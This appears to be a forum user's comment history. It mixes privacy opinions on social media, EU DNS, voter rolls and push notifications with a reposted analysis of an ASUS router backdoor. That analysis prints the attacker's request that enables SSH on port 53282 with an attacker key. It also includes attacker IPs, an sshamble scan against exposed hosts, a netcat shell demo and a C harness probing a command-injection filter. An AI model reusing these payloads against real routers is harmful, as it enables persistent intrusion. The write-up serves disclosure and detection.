stupid_asshole69 [none/use name]

stupid_asshole69 [none/use name]@hexbear.net · 5 days ago

The supposed gnome workflow is for keyboard users to go fuck themselves.

Don’t waste time learning the gnome way of doing things, it’s not gonna remain consistent long enough to let you reap any benefits from that knowledge.

stupid_asshole69 [none/use name]@hexbear.net · 6 days ago

I wouldn’t worry about moving away from the apple devices. Just turn on lockdown and keep it on, do the privacy checkup or whatever it’s called and use a doh profile.

On the other hand, which is to say stuff you should be doing to enhance your privacy, stop voting. Assuming you’re in the us, voter rolls with your home address are free for any advocacy group to peruse. Consider moving your home under a trust or something so that your property taxes are not tied to your name. If you rent, stop renting, if you can’t, consider renting a place from your local credit union instead of from a company. Banks have more chance to protect your privacy than a rental company will r an individual.

stupid_asshole69 [none/use name]@hexbear.net · 9 days ago

I didn’t know they fixed metadata on screenshots, good looking out!

I distinctly remember a time when most phones would pass their model in the headers. That may have passed though!

I gotta ask: where would you put “awareness of screenshot size uniqueness” on a continuum from insane schizo shit to reasonable private person?

I guess if there was a security flaw in your device then a screenshot could tell an attacker that you have the flawed device but there’s other, more subtle, ways a person could do that which don’t require that they acquire a screenshot somehow.

And I guess there is some platonic ideal of a private person who wants to share a screenshot, a literal pixel perfect copy of what’s on the screen on their device, but would also like to conceal the specific model from the person they’re sending the contents of their screen to.

It just seems like the kind of information cognizance of which would be useful in a vanishingly small number of scenarios.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

If you go to a website your phone reports its model number to that website. If it doesn’t then that website can (and often does) use javascript to figure out what model it is with, among other things, viewport size.

Unless you have taken the time to turn it off, your phones model is embedded in the metadata of the screenshot you took.

Before anyone takes action based on this post, consider critically weather your device and usage pattern merit concealing your phone model from people or other entities.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

It’s also the ops bubble. My replies are generally directed at the op and their post.

I will also point to the requirement though, that us visa applicants give up social media account names or be subject to denial as evidence that it’s considered normal.

If it wasn’t considered normal to have social media then the cbp wouldn’t be so quick to implement that process.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

If you’re in dadabots point me at the place to download the full 12hrs of no soul.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

The ol’ sarcasm detectors’ flashing red, ringing the bell and pouring black smoke out of all the panel joints but yes: if you want to fit into society it’s important to have social media.

If you wanted to live a private life in the 1970s, would it be better to descend from your cabin hundreds of miles from civilization with a wild mane of shaggy hair wearing your homemade leather suit or with an unstylish but kempt haircut, nondescript jeans and shirt and military duffel bag looking like any other of the myriad characters wandering the roads at the time?

Obviously you’d want the latter. Part of privacy is blending in so that you don’t arouse interest.

Nowadays if you want to be a private person and still interact in society, like the op, you need to have all the trappings of a someone who doesn’t raise alarm bells. That includes, especially as your age drops, social media.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

Social media is literally normal.

It has gone through a process called normalization in order to become an expected part of social interaction. The op even said that people expect them to have a particular type of account and they feel like not having one excludes them from having more friends.

Yes, you are normal if you have a social media account and abnormal if you don’t.

stupid_asshole69 [none/use name]@hexbear.net · 10 days ago

Anyone have any advice?

Yes: recognize what you’re trying to accomplish and change your actions.

Privacy requires shutting people out of your life. Meeting new people requires letting people into your life.

If people expect that the first “gate” into your life is your social media then meet that expectation. Have a social media presence. Post shit that you want people to see on it.

If you’re afraid of letting the companies that operate social media see your life, examine why. It may be that you’re perfectly fine with the trade off of a limited hang out in exchange for looking normal. Most people are.

It doesn’t have to be instagram. You could have a snapchat or a tiktok or whatever.

stupid_asshole69 [none/use name]@hexbear.net · 11 days ago

No, you can’t.

You are not the hero, effortlessly weaving down the highway between minivans on your 1300cc motorcycle, katana strapped across your back, using dual handlebar mounted twiddler boards to hack the multiverse.

If ai driven agentic systems were used to obfuscate a persons interactions online then the fact that they were using those systems would become incredibly obvious and provide a trove of information that could be easily used to locate and document what that person was doing.

But let’s assume what the op did worked, and no one could tell the difference.

That would be worse! Suddenly there’s hundreds of thousands of data points that could be linked to you and all that’s needed for a warrant are two or three that could be interpreted as probable cause of a crime!

You thought you were helping yourself out by turning the fuzzer on before reading trot pamphlets hosted on marxists.org but now they have an expressed interest in drain cleaner and glitter bombs and best case scenario you gotta adopt a new pitt mix from the humane society.

stupid_asshole69 [none/use name]@hexbear.net · 12 days ago

This isn’t a very smart idea.

People trying to obfuscate their actions would suddenly have massive associated datasets of actions to sift through and it would be trivial to distinguish between the browsing behaviors of a person and a bot.

Someone else said this is like chaff or flare anti missile defense and that’s a good analog. Anti missile defenses like that are deployed when the target recognizes a danger and sees an opportunity to confuse that danger temporarily. They’re used in conjunction with maneuvering and other flight techniques to maximize the potential of avoiding certain death, not constantly once the operator comes in contact with an opponent.

On a more philosophical tip, the masters tools cannot be turned against him.

stupid_asshole69 [none/use name]@hexbear.net · 12 days ago

Please stop. They accept cash, just use cash.

stupid_asshole69 [none/use name]@hexbear.net · 23 days ago

Threema ballz

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

Some minuscule portion of individual users may do so.

Organizations will implement eurodns as best practice for regulatory compliance. Providers will do so as well.

Almost every internet device uses whatever dhcp gives them as dns. When all the companies, government bodies and providers use eurodns to be compliant with the regulatory frameworks that allow them to continue operating in the eu that change will trickle down to users automatically.

It’s also worth remembering that surveillance is extremely normalized in the eu and eurozone compared to many other nations and areas. Of the vanishingly small percentage of users who are both aware of the concept of dns and choose to change it, a portion of them will accept and use eurodns.

Again, you may think I’m wrong but give it a few years.

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

For now.

The whole stated point of this action is to make sure there is a dns provider who is required to be compliant with eu law.

Then entities who have a requirement to be compliant with some recordkeeping or framework of eu law (surprise, it’s all of them!) must use it.

Oh look here, because you ended up using eurodns for gdpr compliance you’re also required to turn over all records upon a lawful inquiry!

It just so happens that dns requests meet the minimum requirements for further search and surveillance, how lucky for me! Who could have ever expected this?

It’s easy to dismiss what I’m saying because it’s not happening at this very moment, but give it a few years and we’ll see liberals bemoaning the suffering of freedom loving peoples languishing under the great Eurovision firewall.

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

Nah the whole point of the Russian federation copying China, five eyes nations getting butthurt about ech/doh and ultimately this European dns system that ensures name resolution is compliant with euro regulation is to preserve national interests in a multipolar world on the stage of the global internet.

You don’t gotta worry about icann or anybody else if you control the way the internet works for your citizens.

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

Hell yeah. Balkanize the internet more!

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

This sounds like news but it is not. It is also not unique to apple. If you use push notifications on any platform you’re susceptible to this.

Push notifications are often unencrypted beacons that are used by cops to corroborate surveillance between devices even when the content transferred between devices isn’t available or incriminating.

It’s the old “you say you weren’t involved but call records indicate you communicated with the suspect despite being in another county at the time of the crime” but updated to digital. When cops want cause for a warrant or some kind of wiretap they use push notifications to establish it.

If you’re doing crimes or whatever, turn off push notifications. They can be used to establish that you communicated with someone or that you were in a specific area.

Again, this is not unique to apple devices.

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

The technical analysis of that source pt 3:

spoiler

This produces a list of allowed characters to get past this gate:

Dec Hex Char Dec Hex Char Dec Hex Char 0 0x00 9 0x09 10 0x0A 11 0x0B 12 0x0C 13 0x0D 32 0x20 43 0x2B + 45 0x2D - 46 0x2E . 47 0x2F / 48 0x30 0 49 0x31 1 50 0x32 2 51 0x33 3 52 0x34 4 53 0x35 5 54 0x36 6 55 0x37 7 56 0x38 8 57 0x39 9 65 0x41 A 66 0x42 B 67 0x43 C 68 0x44 D 69 0x45 E 70 0x46 F 71 0x47 G 72 0x48 H 73 0x49 I 74 0x4A J 75 0x4B K 76 0x4C L 77 0x4D M 78 0x4E N 79 0x4F O 80 0x50 P 81 0x51 Q 82 0x52 R 83 0x53 S 84 0x54 T 85 0x55 U 86 0x56 V 87 0x57 W 88 0x58 X 89 0x59 Y 90 0x5A Z 95 0x5F _ 97 0x61 a 98 0x62 b 99 0x63 c 100 0x64 d 101 0x65 e 102 0x66 f 103 0x67 g 104 0x68 h 105 0x69 i 106 0x6A j 107 0x6B k 108 0x6C l 109 0x6D m 110 0x6E n 111 0x6F o 112 0x70 p 113 0x71 q 114 0x72 r 115 0x73 s 116 0x74 t 117 0x75 u 118 0x76 v 119 0x77 w 120 0x78 x 121 0x79 y 122 0x7A z 126 0x7E ~ The originally vulnerable CVE-2023-39780 workflow for auth_google_check_token_status appears to be correctly patched in FW_RT_AX55_300438652332. is_valid_oauth_code interestingly validates a buffer size of 2048 bytes while it’s passed to snprintf with a size of 1024, so truncation can occur. However, because the token is formatted inside of single-quotes ’ this only results in a shell error. I don’t believe escaping the single-quotes of this particular function is possible given the allowed characters.

–body-data 'refresh_token=AAAAAAAAAAAAAAAAAAAAA(…)

sh: syntax error: unterminated quoted string

And since we don’t trust vendors to be thorough, we should go check the other 4 functions that are nearly identical to auth_google_check_token_status that the developers may have forgotten to use single-quotes. Alternatively, if you’re not a reverse engineer capable of checking this for yourself, get your ASUS router off the internet.

Summary and IoCs

IPs:

101[.]99[.]91[.]151 101[.]99[.]94[.]173 79[.]141[.]163[.]179 111[.]90[.]146[.]237 ASUS Filesystem:

/tmp/BWSQL-LOG /tmp/home/root/.ssh/authorized_keys Pubkey:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== rsa 2048

stupid_asshole69 [none/use name]@hexbear.net · 1 month ago

The technical analysis of that source pt 2:

spoiler

if (f_exists(“/tmp/BWSQL_LOG”) > 0) { var_8f0_1 = &var_7e0; str_1 = str; snprintf(&var_420, 0x400, "echo “[BWDPI_SQLITE]%d/%d[%s] %s…”, i_3, j_1, str_1, var_8f0_1); system(&var_420); // DANGER }

Mystery CVE!

I’m not the only one who has noticed this vulnerability. A full write-up analyzing this critical design flaw is available here: https://leeyabug.top/ASUS-SQLI

Wed, Feb 19, 11:44 —— ASUS confirmed the vul, will add a hall of fame and assign a CVE. discovered by leeya_bug If I wanted to ensure multiple ways to regain access to a router after being locked out, this would be an effective approach.

current_page=Advanced_System_Content.asp &next_page=Advanced_System_Content.asp &modified=0 &flag= &action_mode=apply &action_wait=5 &action_script=restart_time%3Brestart_upnp%3Brestart_usb_idle%3B &first_time= &preferred_lang=EN &reboot_schedule_enable=0 &reboot_schedule_enable_x=0 &telnetd_enable=0 &sshd_enable=1 &sshd_port=53282 &sshd_port_x=53282 &sshd_pass=0 &sshd_authkeys=ssh-rsa+AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV%2BYPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay%2FxDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz%2FMPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG%2Fdj%2B37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9%2FgmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv%2Fx6IcCcKgi2w%3D%3D+rsa+2048-020623 &shell_timeout_x=20

This payload leverages built-in ASUS router features to enable SSH on both LAN and WAN, bind it to TCP/53282, and add an attacker-controlled public key::

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== rsa 2048-020623 Because this key is added using the official ASUS features, this config change is persisted across firmware upgrades. If you’ve been exploited previously, upgrading your firmware will NOT remove the SSH backdoor.

Can you prove that the 4,853 (and steadily increasing) hosts from this Censys search are actually backdoored with this SSH pubkey? Yes. One of the features of sshamble by runZero is the ability to take a pubkey attacker.pub and a username, and determine if the remote host has the associated pubkey inserted.

In this case, the attacker possesses information we do not—specifically, the username. We suspect this was gathered earlier through brute force attacks. With a sample size of ~5,000, it is likely that at least one user chose “admin” as their username.

sshamble scan --checks pubkey-hunt -u admin --pubkey-hunt-file attacker.pub --input-targets censys-ips.txt

And sure enough, someone has. We can confirm that the attacker controlled pubkey has been installed for the admin user on the remote machine on TCP/53282. Something privileged that has absolutely no business being there.

“pubKeyHuntResults”: [ “ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZJ8L5mzhhaxfGzpHR8Geay/xDlVDSJ8MJwA4RJ7o21KVfRXqFblQH4L6fWIYd1ClQbZ6Kk1uA1r7qx1qEQ2PqdVMhnNdHACvCVz/MPHTVebtkKhEl98MZiMOvUNPtAC9ppzOSi7xz3cSV0n1pG/dj+37pzuZUpm4oGJ3XQR2tUPz5MddupjJq9/gmKH6SJjTrHKSECe5yEDs6c3v6uN4dnFNYA5MPZ52FGbkhzQ5fy4dPNf0peszR28XGkZk9ctORNCGXZZ4bEkGHYut5uvwVK1KZOYJRmmj63drEgdIioFv/x6IcCcKgi2w== admin” ]

Demoing the Attacks

After obtaining a physical ASUS RT-AX55 (which is affected by the identified CVE-2023-39780), we used the above payloads to execute commands and spawn a netcat listener without any issues.

Starting Nmap 7.80 ( https://nmap.org/ ) at 2025-03-21 13:10 EDT Nmap scan report for RT-AX55-4960 (192.168.50.1) Host is up (0.012s latency).

PORT STATE SERVICE 1111/tcp open lmsocialserver

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds remy@remy-XPS-13-9310:~$ nc -vvv 192.168.50.1 1111 Connection to 192.168.50.1 1111 port [tcp/*] succeeded! �� badmin@RT-AX55-4960:/tmp/bwdpi# ls ls app_patrol.conf bwdpi.rule.db key.enc tmfbe_workdir bwdpi.app.db dcd.conf libshn_pctrl.so wred.conf bwdpi.appdb.db dcd.pid model.enc wred.pid bwdpi.beh.db dcd.stat ntdasus2014.cert bwdpi.cat.db dev_wan rule.version bwdpi.devdb.db guid shn.pem

taking ARMs against a sea of troubles

While updating my new ASUS RT-AX55 to the latest firmware, I noticed a recent security update released just three days ago.

Unfortunately, the download link is broken and returns a 404 error.

Shortly afterward, the download description and link disappeared entirely.

So, I installed the latest available version and moved on. (Of course, that didn’t solve the issue.)

Patch Diffing

I do have FW_RT_AX55_300438651598.zip and FW_RT_AX55_300438652332.zip(newest) firmwares available. A quick unblob / binwalk makes quick work of extracting the squashfs-root filesystem.

The old vulnerable function looks a bit like this:

nvram_set(“oauth_google_token_status”, &data_174fea[0xf]); void var_410; memset(&var_410, 0, 0x400);

if (!check_if_dir_exist(“/tmp/oauth/”)) mkdir(“/tmp/oauth/”, 0x1ed);

snprintf(&var_410, 0x400, “wget --no-check-certificate --ti…”, 3, 1, nvram_get(), “103584452676-437qj6gd8o9tuncit9h…”, “xivDhVGSSHZ3LJMx228wdcDf”, “refresh_token”, “/tmp/oauth/google_access_token.j…”, “https://www.googleapis.com/oauth…”);

if (f_exists(“/tmp/OAUTH_DEBUG”) > 0) cprintf(“[OAUTH][%s:(%d)]post cmd : %s\n”, “oauth_google_check_token_status”, 0x5b6, &var_410);

system(&var_410); // DANGER

The newest patch available just wraps the above code in an if statement from an external function is_valid_auth_code from /usr/lib/libshared.so

if (is_valid_oauth_code()){ //Same code as before }

Authors Note: While not directly relevant to our current investigation, --no-check-certificate on the wget command means that your Google OAuth token is sent to a remote server without validating the SSL/TLS certificate. This has implications. We grab a cross-compiler toolchain for a compatible GLIBC version from https://toolchains.bootlin.com/ and cross-compile an ARM binary that will load libshared.so, dumping a list of valid characters from the new gatekeeper function, prompting us to allow playing with the input, and passing the input through the same snprintf and system calls as in the original binary.

#Cross compile armv5-eabi–glibc–stable-2020.02-1/bin/arm-linux-gcc -o callshared.elf callshared.c -ldl #ELF check file callshared.elf #Move binary into firmware squashfs root cp callshared.elf ./squashfs-root/bin/callshared.elf #Move QEMU emulator binary into squashfs root cp /usr/bin/qemu-arm-static ./squashfs-root/bin/qemu-arm-static #Change root, load libshared.so, execute our hook sudo chroot ./squashfs-root/ qemu-arm-static -E LD_PRELOAD=“/usr/lib/libshared.so” /bin/busybox sh -c “/bin/callshared.elf”

callshared.c

#include <stdio.h> #include <stdint.h> #include <dlfcn.h> #include <string.h>

#define MAX_INPUT 4096

int main() { void *handle; int (*oc)(char *); // Function pointer with return type int char *error; char input[MAX_INPUT]; int result; __uint8_t curChar;

// Open the shared object file
handle = dlopen("libshared.so", RTLD_LAZY);
if (!handle)
{
    fprintf(stderr, "%s\n", dlerror());
    return 1;
}

// Get a pointer to the is_valid_oauth_code function
oc = (int (*)(char *))dlsym(handle, "is_valid_oauth_code");
if ((error = dlerror()) != NULL)
{
    fprintf(stderr, "%s\n", error);
    dlclose(handle);
    return 1;
}

for (uint16_t i = 0; i <= 0xFF; i++)
{
    uint8_t byte_value = (uint8_t)i;
    char char_value = (char)byte_value;
    result = (*oc)(&char_value);
    if (result)
    {
        printf("Value: %3u, Hex: 0x%02X, Char: %c\n", byte_value, byte_value, char_value);
    }
}

// Get user input
while (1)
{
    printf("Enter an oauth code: ");
    if (fgets(input, MAX_INPUT, stdin) == NULL)
    {
        fprintf(stderr, "Error reading input\n");
        dlclose(handle);
        return 1;
    }

    // Remove newline character if present
    input[strcspn(input, "\n")] = 0;

    // Call the is_valid_oauth_code function with user input and store the result
    result = (*oc)(input);

    // Print the returned value
    printf("Return value: %d\n", result);

    if (result)
    {
        char buffer[1024];
        int o = snprintf(&buffer,
                         1024,
                         "wget --no-check-certificate --timeout=%d --tries=%d --method POST --header 'content-type: application/x-www-form-urlencoded' --header 'cache-control: no-cache' --body-data 'refresh_token=%s&client_id=%s&client_secret=%s&grant_type=%s' --output-document=%s %s",
                         3,
                         1,
                         input,
                         "103584452676-437qj6gd8o9tuncit9h8h7cendd2eg58.apps.googleusercontent.com",
                         "xivDhVGSSHZ3LJMx228wdcDf",
                         "refresh_token",
                         "/tmp/oauth/google_access_token.json",
                         //IP for example.com since DNS resolver doesn't exist inside emulated sandbox
                         "http://23.215.0.136/AAAAAAAAAAAAAAAAAAA");

        printf("Overflowed: %d", o);
        printf("\n%s\n", buffer);
        int e = system(buffer);
    }
}

// Close the shared object
dlclose(handle);
return 0;

}